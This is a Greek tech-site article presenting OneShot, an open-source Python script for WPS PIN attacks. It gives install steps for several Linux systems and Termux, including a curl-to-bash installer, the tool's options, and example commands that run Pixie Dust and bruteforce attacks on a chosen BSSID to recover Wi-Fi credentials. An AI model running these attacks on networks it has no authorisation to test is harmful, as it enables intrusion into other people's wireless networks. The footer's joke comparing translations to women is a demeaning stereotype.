OneShot: Επιθέσεις WPS Pin χωρίς λειτουργία monitoring!

Το OneShot είναι ένα python script, ανοιχτού κώδικα που εκτελεί επιθέσεις Pixie Dust χωρίς να χρειάζεται να γίνει πρώτα αλλαγή του interface σε λειτουργία παρακολούθησης (monitoring).

hack

Χαρακτηριστικά

Απαιτήσεις συστήματος

Εγκατάσταση

Debian/Ubuntu

sudo apt install -y python3 wpasupplicant iw wget

Εγκατάσταση Pixiewps

Ubuntu 18.04 και νεότερη έκδοση ή Debian 10 και νεότερη έκδοση

sudo apt install -y pixiewps

Άλλες εκδόσεις

sudo apt install -y build-essential unzip
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make
sudo make install

Λήψη OneShot

cd ~
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Προαιρετικά: λήψη μιας λίστας ευάλωτων συσκευών σε pixie dust για επισήμανση στα αποτελέσματα σάρωσης:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Arch Linux

Απαιτήσεις εγκατάστασης

sudo pacman -S wpa_supplicant pixiewps wget python

Λήψη OneShot

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Προαιρετικά: λήψη μιας λίστας ευάλωτων συσκευών σε pixie dust για επισήμανση στα αποτελέσματα σάρωσης:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Alpine Linux

  HawkScan: Εργαλείο ασφαλείας για την συλλογή πληροφοριών σε έναν ιστότοπο

Μπορεί επίσης να χρησιμοποιηθεί για εκτέλεση σε συσκευές Android που χρησιμοποιούν Linux Deploy

Απαιτήσεις εγκατάστασης
Προσθήκη του αποθετηρίου δοκιμών:

sudo sh -c 'echo "http://dl-cdn.alpinelinux.org/alpine/edge/testing/" >> /etc/apk/repositories'
sudo apk add python3 wpa_supplicant pixiewps iw

Λήψη OneShot

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Προαιρετικά: λήψη μιας λίστας ευάλωτων συσκευών σε pixie dust για επισήμανση στα αποτελέσματα σάρωσης:

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Termux

Λάβετε υπόψη ότι απαιτείται πρόσβαση root.

Χρήση προγράμματος εγκατάστασης

curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash

Χειροκίνητα

Απαιτήσεις εγκατάστασης

pkg install -y root-repo

pkg install -y git tsu python wpa-supplicant pixiewps iw

Λήψη OneShot

git clone --depth 1 https://github.com/drygdryg/OneShot OneShot

Εκτέλεση

sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

Χρήση

oneshot.py <arguments>
 Required arguments:
     -i, --interface=<wlan0>  : Name of the interface to use

 Optional arguments:
     -b, --bssid=<mac>        : BSSID of the target AP
     -p, --pin=<wps pin>      : Use the specified pin (arbitrary string or 4/8 digit pin)
     -K, --pixie-dust         : Run Pixie Dust attack
     -B, --bruteforce         : Run online bruteforce attack
     --push-button-connect    : Run WPS push button connection

 Advanced arguments:
     -d, --delay=<n>          : Set the delay between pin attempts [0]
     -w, --write              : Write AP credentials to the file on success
     -F, --pixie-force        : Run Pixiewps with --force option (bruteforce full range)
     -X, --show-pixie-cmd     : Alway print Pixiewps command
     --vuln-list=<filename>   : Use custom file with vulnerable devices list ['vulnwsc.txt']
     --iface-down             : Down network interface when the work is finished
     -l, --loop               : Run in a loop
     -v, --verbose            : Verbose output

Ξεκινήστε την επίθεση Pixie Dust σε ένα καθορισμένο BSSID:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

Εμφάνιση διαθέσιμων δικτύων και εκτέλεση επίθεσης Pixie Dust σε ένα καθορισμένο δίκτυο:

sudo python3 oneshot.py -i wlan0 -K

 WPS bruteforce επίθεση με το καθορισμένο πρώτο μισό του PIN:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

Λειτουργία σύνδεσης WPS:

Κατεβάστε το πρόγραμμα από εδώ.

Εγγραφή στο iGuRu.gr μέσω email

Το email σας για την αποστολή κάθε νέας δημοσίευσης

Ακολουθήσετε μας στο Google News iGuRu.gr at Google news

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Αφήστε μια απάντηση

Your email address will not be published.

4  +  3  =  

Previous Story

Κενό ασφαλείας στο Rarible NFT Marketplace με περισσότερους από 2 εκατ. μηνιαίους χρήστες

Next Story

Chrome 100.0.4896.127 ενημερώστε άμεσα (0day)